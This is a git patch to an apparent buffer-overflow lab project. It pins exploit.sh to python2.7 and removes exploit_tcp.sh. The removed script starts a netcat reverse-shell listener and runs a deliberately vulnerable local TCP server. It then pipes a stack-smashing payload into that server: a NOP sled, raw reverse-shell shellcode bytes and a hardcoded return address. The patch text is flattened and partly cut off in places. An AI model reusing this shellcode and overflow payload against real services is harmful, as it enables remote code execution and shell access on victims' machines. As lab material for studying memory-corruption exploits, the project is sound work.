From 05bcdd20a2ba4a28ae7028020fbfbf046e97dae6 Mon Sep 17 00:00:00 2001 From: lns Date: Wed, 11 Jul 2018 11:45:33 +0200 Subject: exploit.sh: force python2.7, deleted non-working exploit_tcp.sh (will be replaced in the future anyway) Signed-off-by: lns --- exploit.sh | 16 ++++++++-------- exploit_tcp.sh | 30 ------------------------------ 2 files changed, 8 insertions(+), 38 deletions(-) delete mode 100755 exploit_tcp.sh diff --git a/exploit.sh b/exploit.sh index 92fad29..643fa50 100755 --- a/exploit.sh +++ b/exploit.sh @@ -41,7 +41,7 @@ find_return_adr64() { echo "$0: check adr index: $3" return 1 fi -python - < 260 - 102 = 158 / 2 = 79 -# 79xNOP (0x90) + shellcode + 79xNOP (0x90) + return addr - -echo "starting netcat reverse tcp server .." -screen -c /dev/null -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444 -sleep 1 -echo "starting exploitable tcp server .." -./overflow_tcp & -sleep 1 - -host="127.0.0.1" -echo "connecting to $host .." -python -c 'print "\x90"*79 + \ -"\xba\x91\x60\x15\x91\xdb\xd6\xd9\x74\x24\xf4\x5f\x2b\xc9" + \ -"\xb1\x13\x31\x57\x15\x83\xc7\x04\x03\x57\x11\xe2\x64\x51" + \ -"\xce\x66\x65\xc1\xb3\xdb\x03\xe4\xba\x3d\x63\x8e\x71\x3d" + \ -"\x10\x16\x3a\x01\xdb\x29\x73\x07\x1a\x41\xfb\xf7\xdc\x93" + \ -"\x6b\xfa\xdc\x82\x37\x73\x3d\x14\xa1\xd3\xec\x06\x9d\xd7" + \ -"\x87\x48\x2c\x57\xc5\xe2\x80\x77\x9a\x9a\xb6\xa8\x3e\x32" + \ -"\x29\x3e\x5d\x96\xe6\xc9\x40\xa7\x02\x07\x02\xf9\xcf\xfd" + \ -"\x03\xa2\x22\x81" + \ -"\x90"*83 + "\x9d\xd4\xff\xff"' | nc -q 0 "$host" 3000 -read -p "[PRESS RETURN TO CONTINUE]" - -screen -R overcat -- cgit v1.2.3